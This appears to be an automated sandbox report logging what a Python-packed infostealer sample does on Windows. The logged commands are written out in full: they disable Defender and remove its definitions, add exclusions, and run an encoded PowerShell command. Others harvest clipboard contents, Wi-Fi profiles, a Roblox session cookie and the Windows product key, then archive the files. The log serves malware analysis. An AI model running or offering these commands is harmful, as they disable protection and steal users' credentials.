              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob omitted]"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command blob omitted]
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D2FB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,72_2_00007FF71D2FB340
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B111A420 cpuid 0_2_00007FF7B111A420
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\libcrypto-1_1.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\libssl-1_1.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
